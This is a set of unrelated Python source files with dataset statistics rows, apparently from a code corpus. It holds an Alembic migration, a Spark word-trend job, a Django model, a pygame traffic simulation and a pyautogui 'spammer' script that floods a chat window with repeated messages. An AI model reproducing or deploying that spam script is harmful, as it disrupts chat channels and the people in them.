sa.Column('review_status', sa.Enum('pending', 'approved', 'rejected', name='reviewstatus'), nullable=True),
sa.Column('lifetime_stage', sa.Enum('draft', 'ongoing', 'finalizing', 'finished', name='lifetimestage'), nullable=False),
sa.ForeignKeyConstraint(['creator_email'], ['accounts.email'], ),
sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('stock_changes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('amount', sa.Integer(), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('status', sa.Enum('carried_out', 'pending', 'ready_for_pickup', 'rejected', name='stockchangestatus'), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.Column('variety_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('activities',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=True),
sa.Column('start_date', sa.DateTime(timezone=True), nullable=True),
sa.Column('end_date', sa.DateTime(timezone=True), nullable=True),
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('working_hours', sa.Integer(), nullable=False),
sa.Column('reward_rate', sa.Integer(), nullable=False),
sa.Column('fixed_reward', sa.Boolean(), nullable=False),
sa.Column('people_required', sa.Integer(), nullable=False),
sa.Column('telegram_required', sa.Boolean(), nullable=False),
sa.Column('application_deadline', sa.DateTime(timezone=True), nullable=True),
sa.Column('feedback_questions', sa.ARRAY(sa.String(length=1024)), nullable=False),
sa.Column('internal', sa.Boolean(), nullable=False, server_default='False'),
sa.CheckConstraint('(fixed_reward AND working_hours = 1) OR (NOT fixed_reward AND reward_rate = 70)', name='reward policy'),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name', 'project_id', name='name is unique inside a project')
)
op.create_table('project_files',
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('file_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['file_id'], ['static_files.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ),
sa.PrimaryKeyConstraint('project_id', 'file_id')
)
op.create_table('project_moderation',
sa.Column('project_id', sa.Integer(), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], onupdate='CASCADE', ondelete='CASCADE'),
sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('project_id', 'account_email')
)
op.create_table('activity_competence',
sa.Column('activity_id', sa.Integer(), nullable=False),
sa.Column('competence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('activity_id', 'competence_id')
)
op.create_table('applications',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('applicant_email', sa.String(length=128), nullable=False),
sa.Column('activity_id', sa.Integer(), nullable=False),
sa.Column('comment', sa.String(length=1024), nullable=True),
sa.Column('application_time', sa.DateTime(timezone=True), nullable=False),
sa.Column('telegram_username', sa.String(length=32), nullable=True),
sa.Column('status', sa.Enum('approved', 'pending', 'rejected', name='applicationstatus'), nullable=False),
sa.Column('actual_hours', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['applicant_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('applicant_email', 'activity_id', name='only one application')
)
op.create_table('feedback',
sa.Column('application_id', sa.Integer(), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('answers', sa.ARRAY(sa.String(length=1024)), nullable=False),
sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('application_id'),
sa.UniqueConstraint('application_id')
)
op.create_table('reports',
sa.Column('application_id', sa.Integer(), nullable=False),
sa.Column('reporter_email', sa.String(length=128), nullable=False),
sa.Column('time', sa.DateTime(timezone=True), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('content', sa.String(length=1024), nullable=True),
sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ),
sa.ForeignKeyConstraint(['reporter_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('application_id', 'reporter_email')
)
op.create_table('feedback_competence',
sa.Column('feedback_id', sa.Integer(), nullable=False),
sa.Column('competence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('feedback_id', 'competence_id')
)
op.create_table('transactions',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('account_email', sa.String(length=128), nullable=False),
sa.Column('change', sa.Integer(), nullable=False),
sa.Column('stock_change_id', sa.Integer(), nullable=True),
sa.Column('feedback_id', sa.Integer(), nullable=True),
sa.CheckConstraint('(stock_change_id IS NULL) OR (feedback_id IS NULL)', name='not(feedback and stock_change)'),
sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='SET NULL'),
sa.ForeignKeyConstraint(['stock_change_id'], ['stock_changes.id'], ondelete='SET NULL'),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Drop tables child-first so no foreign key ever points at a
    # missing parent; the order mirrors the reverse of upgrade().
    tables_in_drop_order = (
        'transactions',
        'feedback_competence',
        'reports',
        'feedback',
        'applications',
        'activity_competence',
        'project_moderation',
        'project_files',
        'activities',
        'stock_changes',
        'projects',
        'product_images',
        'varieties',
        'static_files',
        'notifications',
        'sizes',
        'products',
        'competences',
        'colors',
        'accounts',
    )
    for table_name in tables_in_drop_order:
        op.drop_table(table_name)
    # ### end Alembic commands ###
| 50.54065 | 332 | 0.696292 | 1,490 | 12,433 | 5.681208 | 0.14094 | 0.086001 | 0.122268 | 0.133963 | 0.632605 | 0.606734 | 0.524631 | 0.47218 | 0.382044 | 0.270644 | 0 | 0.010424 | 0.120405 | 12,433 | 245 | 333 | 50.746939 | 0.763625 | 0.022762 | 0 | 0.257778 | 0 | 0 | 0.259969 | 0.013952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008889 | false | 0 | 0.017778 | 0 | 0.026667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b00d7e128695512faf3dee89d09b98e4ae7a89 | 636 | py | Python | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | build/lib/DateTimeTools/DayNotoDate.py | pshustov/DateTimeTools | e542fd3f0e3c5290faad09b7cf8a2751132d4dd3 | [
"MIT"
] | null | null | null | import numpy as np
from ._CFunctions import _CDayNotoDate
from ._CTConv import _CTConv
def DayNotoDate(Year,Doy):
    '''
    Converts year and day numbers to a date of the format yyyymmdd.

    Inputs
    ======
    Year : int32
        Array or scalar of years
    Doy : int32
        Array or scalar of day numbers

    Returns
    =======
    Date : int
        Array or scalar of dates
    '''
    # cast inputs to the exact ctypes the C++ routine expects
    n_elements = _CTConv(np.size(Doy),'c_int')
    year_ptr = _CTConv(Year,'c_int_ptr')
    doy_ptr = _CTConv(Doy,'c_int_ptr')

    # output buffer, filled in place by the C++ call below
    date_out = np.zeros(n_elements,dtype='int32')

    _CDayNotoDate(n_elements,year_ptr,doy_ptr,date_out)

    return date_out
| 19.272727 | 64 | 0.698113 | 98 | 636 | 4.295918 | 0.479592 | 0.049881 | 0.092637 | 0.106888 | 0.095012 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011696 | 0.193396 | 636 | 32 | 65 | 19.875 | 0.808967 | 0.522013 | 0 | 0 | 0 | 0 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b241b8fb352b546133a594008c04d79660503c | 4,996 | py | Python | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | BigDataArchitecture/application_pod/application.py | Brebeck-Jan/AlphaBigDataTech | df7b63056e7067e366e72193ec8260dbc59b53bb | [
"MIT"
] | null | null | null | ##########################################################################################
##########################################################################################
# BigData - Application #
##########################################################################################
##########################################################################################
##########################################################################################
# import libraries #
##########################################################################################
import findspark
findspark.init()
from pyspark.sql import SparkSession
import happybase
from nltk.corpus import stopwords
import nltk
import pandas as pd
import pymongo
import sys
nltk.download("stopwords")
import time
##########################################################################################
#                                       init spark                                       #
##########################################################################################
# One local Spark session using all available cores; the functions below
# share its SparkContext via the module-level name `sc`.
spark=SparkSession.builder\
    .master("local[*]")\
    .appName("application")\
    .getOrCreate()
sc=spark.sparkContext
##########################################################################################
# prerequisites #
##########################################################################################
# delete umlauts
def umlauts(word):
    """Replace German umlauts and sharp s with their ASCII digraphs."""
    translation_table = str.maketrans({
        'ä': 'ae',
        'ö': 'oe',
        'ü': 'ue',
        'Ä': 'Ae',
        'Ö': 'Oe',
        'Ü': 'Ue',
        'ß': 'ss',
    })
    return word.translate(translation_table)
# exclude punctuation
def lower_clean_str(x):
    """Lowercase *x* and replace every punctuation character with a space."""
    punctuation = '!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~-„“'
    # one C-level pass instead of chained .replace() calls
    return x.lower().translate(str.maketrans(punctuation, ' ' * len(punctuation)))
##########################################################################################
# Application #
##########################################################################################
def application(news):
    """Compute the five most frequent non-stopword words across *news*.

    Parameters
    ----------
    news : list of str
        Article titles fetched from the data lake.

    Returns
    -------
    pandas.DataFrame
        Single column 'trend-word' with up to five rows, most frequent first.
    """
    # create Pipelined RDD
    df = sc.parallelize(news)
    # remove punctuation and transform to lowercase
    df = df.map(lower_clean_str)
    # split sentences into lists of words
    df = df.flatMap(lambda satir: satir.split(" "))
    # exclude whitespaces
    df = df.filter(lambda x: x != '')

    # count how many times each word occurs
    count = df.map(lambda word: (word, 1))
    countRBK = count.reduceByKey(lambda x, y: (x + y)).sortByKey()

    # rank words by frequency, descending
    countRBK = countRBK.map(lambda x: (x[1], x[0]))
    countRBK = countRBK.sortByKey(False)

    # german stopwords, with umlauts rewritten to match the cleaned text;
    # a set gives O(1) membership tests in the filter below
    german_stopwords = {umlauts(word) for word in stopwords.words('german')}

    # delete stopwords
    countRBK = countRBK.filter(lambda x: x[1] not in german_stopwords)

    # Fetch the top five ONCE.  The original called countRBK.take(5) inside
    # the loop, re-running the Spark job on every iteration, raised
    # IndexError when fewer than five distinct words existed, and used
    # DataFrame.append, which was removed in pandas 2.0.
    top_words = [word for _, word in countRBK.take(5)]
    export = pd.DataFrame({'trend-word': top_words})
    return export
##########################################################################################
# attaching database #
##########################################################################################
def data_from_datalake():
    """Read every crawled article title out of the HBase data lake."""
    connection = happybase.Connection(host='lake-connection', port=9090, autoconnect=True)
    table = connection.table('crawled_articles')
    # decode the stored bytes of each row's title column
    titles = [row[b'data:title'].decode('utf-8') for _, row in table.scan()]
    connection.close()
    return titles
##########################################################################################
# Run Application with Data #
##########################################################################################
def write_mongo(result):
    """Upsert the computed trend words into MongoDB.

    *result* is a pandas DataFrame with a single 'trend-word' column; its
    values are stored under the one document with cat == "all" in the
    news.newscollection collection.
    """
    print(result)
    client = pymongo.MongoClient('mongodb://mongo-connection:27017')
    db = client.news
    collection = db.newscollection
    dao_object = {
        "cat": "all",
        "titles": [result.iloc[row, 0] for row in range(len(result))],
    }
    # upsert: create the document on first run, overwrite it afterwards
    collection.update_one({"cat": "all"}, {"$set": dao_object}, upsert=True)
    client.close()
# Run the whole pipeline: lake titles -> Spark trend words -> MongoDB.
write_mongo(application(data_from_datalake()))
# Sleep below so the pod is only rebuilt/restarted after completion.
time.sleep(500) | 37.007407 | 90 | 0.45036 | 423 | 4,996 | 5.264775 | 0.420804 | 0.044005 | 0.066008 | 0.04176 | 0.127077 | 0.110912 | 0.074091 | 0.074091 | 0.074091 | 0.074091 | 0 | 0.006508 | 0.169536 | 4,996 | 135 | 91 | 37.007407 | 0.530007 | 0.232186 | 0 | 0 | 0 | 0 | 0.08044 | 0.013548 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.128571 | 0 | 0.257143 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5b26b56fc6da7a7d52f30abc550181b0a2029e2 | 112 | py | Python | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 14 | 2020-02-04T20:05:02.000Z | 2022-03-13T18:13:20.000Z | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 118 | 2020-06-15T16:40:48.000Z | 2022-03-21T17:25:47.000Z | src/nwb_datajoint/data_import/__init__.py | jihyunbak/spyglass | 780fe2c101db60d42a1b73ad8fd729db42620ba6 | [
"MIT"
] | 16 | 2020-02-04T19:04:07.000Z | 2022-03-18T21:15:32.000Z | from .insert_sessions import insert_sessions
from .storage_dirs import base_dir, check_env, kachery_storage_dir
| 37.333333 | 66 | 0.875 | 17 | 112 | 5.352941 | 0.647059 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089286 | 112 | 2 | 67 | 56 | 0.892157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5b81ac7187e3d891702be4006393c6f2fc6c15a | 327 | py | Python | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | 1 | 2020-02-23T18:16:48.000Z | 2020-02-23T18:16:48.000Z | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | null | null | null | apps/experiments/models.py | mikicz/bulk-update-tests | 85bca2ea05513c42d8f12e3439c27853bbed8c44 | [
"MIT"
] | 1 | 2020-01-23T14:21:44.000Z | 2020-01-23T14:21:44.000Z | from django.db import models
class Experiment(models.Model):
    """Stores the parameters and measured runtime of one benchmark run.

    NOTE(review): field meanings are inferred from names — confirm against
    the benchmark driver code before relying on them.
    """

    # Values stored in `method` below.
    INBUILT = 0
    PACKAGE = 1

    method = models.IntegerField()  # INBUILT or PACKAGE
    field_types = models.CharField(max_length=100)
    fields = models.SmallIntegerField()
    count = models.IntegerField()
    batch_size = models.IntegerField()
    time = models.FloatField()  # presumably seconds — TODO confirm
e5b95944808ec9a85548a9ce892ca8f3e8424bc3 | 751 | py | Python | spammer.py | Potatosil/Pyhton-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | 2 | 2021-11-27T15:54:27.000Z | 2022-01-14T11:21:51.000Z | spammer.py | Potatosil/Python-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | null | null | null | spammer.py | Potatosil/Python-Discord-Spam-Bot | 7d3f12ae4e9c9933754be484ec2755c22ca079d1 | [
"CC0-1.0"
] | null | null | null | import pyautogui, time
from time import sleep
# Ask the user for the batch size and the message text.
spamnum = int(input(f"Input Number: "))
spamtext = input(f"What is the Message u want to send?: ")
# NOTE(review): this rebinds `time`, shadowing the imported `time` module;
# only `sleep` (imported separately from the module) is used afterwards,
# so the script still works.
time = 0
# 10-second countdown so the user can focus the target chat window.
while time != 10:
    time += 1
    sleep(1)
    print("spammer waitinig.." + str(time))
def spam (msg, maxMsg):
    """Type *msg* into the focused window *maxMsg* times, pressing Enter
    after each message, pausing 5 seconds after every `spamnum` messages
    (global batch size read from user input).

    Replaces the original hand-written or-chain of thresholds, which
    contained typos (`spamnum*spamnum` instead of `spamnum*5`,
    `spamnum*20` instead of `spamnum*10`) and silently stopped pausing
    after a handful of batches.
    """
    count = 0
    while count != maxMsg:
        count += 1
        print("sendmessage:" + str(count))
        pyautogui.write(msg)
        pyautogui.press("enter")
        # pause after each full batch of `spamnum` messages
        if count % spamnum == 0:
            sleep(5)
# Run the spam loop, then announce completion in the same chat window.
spam(spamtext, spamnum)
sleep(2)
pyautogui.write("done")
pyautogui.press("enter")
| 25.033333 | 228 | 0.6498 | 111 | 751 | 4.396396 | 0.432432 | 0.245902 | 0.258197 | 0.086066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 0.209055 | 751 | 29 | 229 | 25.896552 | 0.791246 | 0 | 0 | 0.090909 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.136364 | 0.090909 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5bc642c6a81db7a4fc50c2b2445c823d9de303f | 12,795 | py | Python | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | alterations.py | AlexysAlves/Simulacao_de_trafego | 8193b8a47d284c1b84f2903d286d222f3984bbf1 | [
"MIT"
] | null | null | null | import random
import time
import threading
import pygame
import sys
# Default values of signal timers (seconds)
defaultGreen = {0: 10, 1: 10, 2: 10, 3: 10}
defaultRed = 150
defaultYellow = 5

signals = []        # TrafficSignal objects, filled by initialize()
noOfSignals = 4
currentGreen = 0  # Indicates which signal is green currently
nextGreen = (currentGreen + 1) % noOfSignals  # Indicates which signal will turn green next
currentYellow = 0  # Indicates whether yellow signal is on or off

speeds = {'car': 2.25, 'bus': 1.8, 'truck': 1.8, 'bike': 2.5}  # average speeds of vehicles

# Coordinates of vehicles' start (one spawn point per lane, per direction)
x = {'right': [0, 0, 0], 'down': [755, 727, 697], 'left': [1400, 1400, 1400], 'up': [602, 627, 657]}
y = {'right': [348, 370, 398], 'down': [0, 0, 0], 'left': [498, 466, 436], 'up': [800, 800, 800]}

# Registry of Vehicle objects by direction and lane; 'crossed' counts
# vehicles that have passed the stop line for that direction.
vehicles = {'right': {0: [], 1: [], 2: [], 'crossed': 0}, 'down': {0: [], 1: [], 2: [], 'crossed': 0},
            'left': {0: [], 1: [], 2: [], 'crossed': 0}, 'up': {0: [], 1: [], 2: [], 'crossed': 0}}
vehicleTypes = {0: 'car', 1: 'bus', 2: 'truck', 3: 'bike'}
directionNumbers = {0: 'right', 1: 'down', 2: 'left', 3: 'up'}

# Coordinates of signal image and timer on screen
signalCoods = [(530, 230), (810, 230), (810, 570), (530, 570)]
signalTimerCoods = [(530, 210), (810, 210), (810, 550), (530, 550)]

# Coordinates of stop lines per direction
stopLines = {'right': 590, 'down': 330, 'left': 800, 'up': 535}
defaultStop = {'right': 580, 'down': 320, 'left': 810, 'up': 545}
# stops = {'right': [580,580,580], 'down': [320,320,320], 'left': [810,810,810], 'up': [545,545,545]}

# Gap between vehicles (pixels)
stoppingGap = 15  # stopping gap
movingGap = 15  # moving gap

pygame.init()
simulation = pygame.sprite.Group()
class TrafficSignal:
    """Remaining red/yellow/green durations (seconds) for one traffic light.

    `signalText` holds the string rendered next to this signal's timer.
    """

    def __init__(self, red, yellow, green):
        self.red, self.yellow, self.green = red, yellow, green
        self.signalText = ""
class Vehicle(pygame.sprite.Sprite):
    """A vehicle sprite moving through the intersection.

    On construction it registers itself in the global `vehicles` registry
    and the `simulation` sprite group, computes the coordinate where it
    must stop (behind the previous vehicle in its lane, or at the lane's
    default stop position), and pushes the lane's global spawn point back
    so the next vehicle spawns behind this one.
    """

    def __init__(self, lane, vehicleClass, direction_number, direction):
        pygame.sprite.Sprite.__init__(self)
        self.lane = lane
        self.vehicleClass = vehicleClass
        self.speed = speeds[vehicleClass]
        self.direction_number = direction_number
        self.direction = direction
        self.x = x[direction][lane]
        self.y = y[direction][lane]
        self.crossed = 0  # becomes 1 once the vehicle passes its stop line
        vehicles[direction][lane].append(self)
        self.index = len(vehicles[direction][lane]) - 1
        path = "images/" + direction + "/" + vehicleClass + ".png"
        self.image = pygame.image.load(path)

        if (len(vehicles[direction][lane]) > 1 and vehicles[direction][lane][
            self.index - 1].crossed == 0):  # if more than 1 vehicle in the lane of vehicle before it has crossed stop line
            if (direction == 'right'):
                self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][
                    self.index - 1].image.get_rect().width - stoppingGap  # setting stop coordinate as: stop coordinate of next vehicle - width of next vehicle - gap
            elif (direction == 'left'):
                self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][
                    self.index - 1].image.get_rect().width + stoppingGap
            elif (direction == 'down'):
                self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][
                    self.index - 1].image.get_rect().height - stoppingGap
            elif (direction == 'up'):
                self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][
                    self.index - 1].image.get_rect().height + stoppingGap
        else:
            self.stop = defaultStop[direction]

        # Set new starting and stopping coordinate: shift the lane's spawn
        # point back by this vehicle's length plus the stopping gap.
        if (direction == 'right'):
            temp = self.image.get_rect().width + stoppingGap
            x[direction][lane] -= temp
        elif (direction == 'left'):
            temp = self.image.get_rect().width + stoppingGap
            x[direction][lane] += temp
        elif (direction == 'down'):
            temp = self.image.get_rect().height + stoppingGap
            y[direction][lane] -= temp
        elif (direction == 'up'):
            temp = self.image.get_rect().height + stoppingGap
            y[direction][lane] += temp
        simulation.add(self)

    def render(self, screen):
        """Draw this vehicle's image at its current position."""
        screen.blit(self.image, (self.x, self.y))

    def move(self):
        """Advance the vehicle by one tick.

        It moves when (it has not reached its stop coordinate, OR it has
        already crossed the stop line, OR its direction currently has a
        green light) AND (it is first in its lane, OR there is at least
        `movingGap` space to the vehicle ahead).
        """
        if (self.direction == 'right'):
            if (self.crossed == 0 and self.x + self.image.get_rect().width > stopLines[
                self.direction]):  # if the image has crossed stop line now
                self.crossed = 1
            if ((self.x + self.image.get_rect().width <= self.stop or self.crossed == 1 or (
                    currentGreen == 0 and currentYellow == 0)) and (
                    self.index == 0 or self.x + self.image.get_rect().width < (
                    vehicles[self.direction][self.lane][self.index - 1].x - movingGap))):
                self.x += self.speed  # move the vehicle
        elif (self.direction == 'down'):
            if (self.crossed == 0 and self.y + self.image.get_rect().height > stopLines[self.direction]):
                self.crossed = 1
            if ((self.y + self.image.get_rect().height <= self.stop or self.crossed == 1 or (
                    currentGreen == 1 and currentYellow == 0)) and (
                    self.index == 0 or self.y + self.image.get_rect().height < (
                    vehicles[self.direction][self.lane][self.index - 1].y - movingGap))):
                self.y += self.speed
        elif (self.direction == 'left'):
            if (self.crossed == 0 and self.x < stopLines[self.direction]):
                self.crossed = 1
            if ((self.x >= self.stop or self.crossed == 1 or (currentGreen == 2 and currentYellow == 0)) and (
                    self.index == 0 or self.x > (
                    vehicles[self.direction][self.lane][self.index - 1].x + vehicles[self.direction][self.lane][
                self.index - 1].image.get_rect().width + movingGap))):
                self.x -= self.speed
        elif (self.direction == 'up'):
            if (self.crossed == 0 and self.y < stopLines[self.direction]):
                self.crossed = 1
            if ((self.y >= self.stop or self.crossed == 1 or (currentGreen == 3 and currentYellow == 0)) and (
                    self.index == 0 or self.y > (
                    vehicles[self.direction][self.lane][self.index - 1].y + vehicles[self.direction][self.lane][
                self.index - 1].image.get_rect().height + movingGap))):
                self.y -= self.speed
# Initialization of signals with default values
def initialize():
    """Create the four TrafficSignal objects and start the signal cycle.

    ts1 starts green immediately; ts2 stays red for ts1's full cycle;
    ts3 and ts4 start with the default red time.  Ends by entering the
    never-returning repeat() loop, so this is meant to run on its own
    (daemon) thread.
    """
    ts1 = TrafficSignal(0, defaultYellow, defaultGreen[0])
    signals.append(ts1)
    ts2 = TrafficSignal(ts1.red + ts1.yellow + ts1.green, defaultYellow, defaultGreen[1])
    signals.append(ts2)
    ts3 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[2])
    signals.append(ts3)
    ts4 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[3])
    signals.append(ts4)
    repeat()
def repeat():
    """Cycle the traffic signals forever: green -> yellow -> next signal.

    Runs one-second ticks via updateValues()/time.sleep(1); never returns,
    so it must run on its own (daemon) thread.

    Fix: the original implementation called repeat() recursively at the
    end of each cycle, so a long-running simulation would eventually hit
    Python's recursion limit.  The tail call is replaced by a loop.
    """
    global currentGreen, currentYellow, nextGreen
    while True:
        while (signals[currentGreen].green > 0):  # while the timer of current green signal is not zero
            updateValues()
            time.sleep(1)
        currentYellow = 1  # set yellow signal on
        # reset stop coordinates of lanes and vehicles
        for i in range(0, 3):
            for vehicle in vehicles[directionNumbers[currentGreen]][i]:
                vehicle.stop = defaultStop[directionNumbers[currentGreen]]
        while (signals[currentGreen].yellow > 0):  # while the timer of current yellow signal is not zero
            updateValues()
            time.sleep(1)
        currentYellow = 0  # set yellow signal off

        # reset all signal times of current signal to default times
        signals[currentGreen].green = defaultGreen[currentGreen]
        signals[currentGreen].yellow = defaultYellow
        signals[currentGreen].red = defaultRed

        currentGreen = nextGreen  # set next signal as green signal
        nextGreen = (currentGreen + 1) % noOfSignals  # set next green signal
        signals[nextGreen].red = signals[currentGreen].yellow + signals[
            currentGreen].green  # set the red time of next to next signal as (yellow time + green time) of next signal
# Update values of the signal timers after every second
def updateValues():
    """Tick every signal's currently-running timer down by one second.

    The active signal counts down its green (or yellow, while yellow is
    on); every other signal counts down its red time.
    """
    for i in range(noOfSignals):
        sig = signals[i]
        if i != currentGreen:
            sig.red -= 1
        elif currentYellow == 0:
            sig.green -= 1
        else:
            sig.yellow -= 1
# Generating vehicles in the simulation
def generateVehicles():
    """Continuously spawn vehicles; the spawn interval depends on the
    simulated time of day.  Runs forever — start on a daemon thread.
    """
    # simulated clock in minutes; 360 == 06:00
    daytime = 360
    sleeptime = 0
    while (True):
        lane_number = 2  # original version: random.randint(1,2)
        # cumulative percentage thresholds: 60% car, 10% bus, 10% truck, 20% bike
        cartype = [60, 70, 80, 100]
        # cumulative percentage thresholds: 50% 'right', 50% 'up'
        dist = [50, 100]
        temp1 = random.randint(0, 99)
        temp2 = random.randint(0, 99)
        direction_number = 0
        if (temp1 < cartype[0]):
            vehicle_type = 0
        elif (temp1 < cartype[1]):
            vehicle_type = 1
        elif (temp1 < cartype[2]):
            vehicle_type = 2
        elif (temp1 < cartype[3]):
            vehicle_type = 3
        if (temp2 < dist[0]):
            direction_number = 0
        elif (temp2 < dist[1]):
            direction_number = 3
        # Spawn interval (seconds) by time of day.
        # NOTE(review): daytime starts at 360 and only grows, so the
        # `daytime < 360` branch is unreachable and the clock never wraps
        # past midnight — presumably it should be taken modulo 1440.
        if (daytime < 360):
            sleeptime = 5
        elif (daytime >= 360 and daytime < 480):
            sleeptime = 2
        elif (daytime >= 480 and daytime < 720):
            sleeptime = 3
        elif (daytime >= 720 and daytime < 840):
            sleeptime = 2
        elif (daytime >= 840 and daytime < 1080):
            sleeptime = 3
        elif (daytime >= 1080 and daytime < 1260):
            sleeptime = 1
